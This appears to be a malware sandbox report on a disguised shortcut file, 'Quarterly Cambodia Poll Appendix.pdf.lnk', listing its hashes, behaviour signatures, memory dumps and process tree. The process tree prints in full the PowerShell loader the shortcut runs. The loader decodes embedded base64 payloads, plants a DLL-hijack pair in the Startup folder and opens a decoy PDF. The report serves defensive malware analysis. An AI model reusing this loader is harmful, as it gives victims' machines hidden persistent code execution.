Overview

overview

10

Static

static

3

Key Data 2...2).xll

windows7-x64

7

Key Data 2...2).xll

windows10-2004-x64

10

Key Data 2...1).xll

windows7-x64

10

Key Data 2...1).xll

windows10-2004-x64

1

Quarterly ...df.lnk

windows7-x64

7

Quarterly ...df.lnk

windows10-2004-x64

7

Resubmissions

23/10/2024, 13:04

241023-qbdl4atckr 10

20/09/2024, 01:31

240920-bxp5pasejn 10

Analysis

  • max time kernel
    94s
  • max time network
    106s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/09/2024, 01:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Quarterly Cambodia Poll Appendix.pdf.lnk

  • Size

    2.2MB

  • MD5

    23d55b0f6a502c7ed3a70d41272b0732

  • SHA1

    36a2c2cd63e3ca23a7934cfb3e7a957f2b5363f8

  • SHA256

    cfbd704cab3a8edd64f8bf89da7e352adf92bd187b3a7e4d0634a2dc764262b5

  • SHA512

    53984a522f5629f3bf64e62f9855254c74497388f0632e76b00fb16fba7b7fb45ffe2c0db7cd0e7016847f2a5d966e42b3081a47d6fc9a067c6bd0d9d9e752af

  • SSDEEP

    49152:zrdLymX/jNT7IBkZw3xFdyaxDadhCtbdMuC4vmYrl4GRGjEOaUJiuw:

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies registry class 20 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Quarterly Cambodia Poll Appendix.pdf.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';if(Get-ChildItem $env:temp -recurse 'Quarterly Cambodia Poll Appendix.pdf.lnk'){$k=New-Object IO.FileStream ($env:temp+'\'+((Get-ChildItem $env:temp -recurse 'Quarterly Cambodia Poll Appendix.pdf.lnk').Directory).Name+'\'+'Quarterly Cambodia Poll Appendix.pdf.lnk'),'Open','Read','ReadWrite'}else{$k=New-Object IO.FileStream 'Quarterly Cambodia Poll Appendix.pdf.lnk','Open','Read','ReadWrite'};$b=New-Object byte[](2298152);$k.Seek(2953,[IO.SeekOrigin]::Begin);$k.Read($b,0,2298152);$a=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64CharArray($b,0,$b.Length)) -split ':';copy 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe' ($t+'\d.exe');[IO.File]::WriteAllBytes($t+'\d.exe.config',[Convert]::FromBase64""String($a[0]));[IO.File]::WriteAllBytes($t+'\DomainManager.dll',[Convert]::FromBase64""String($a[1]));[IO.File]::WriteAllBytes($env:temp+'\e.pdf',[Convert]::FromBase64""String($a[2]));explorer ($env:temp+'\e.pdf');
      2⤵
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3472
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" C:\Users\Admin\AppData\Local\Temp\e.pdf
        3⤵
          PID:2264
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:1088

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_53hihdaz.5ko.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/3472-2-0x00007FF9E6273000-0x00007FF9E6275000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3472-12-0x00000289A0F90000-0x00000289A0FB2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3472-13-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3472-14-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3472-15-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3472-16-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3472-20-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

      Filesize

      10.8MB

      Download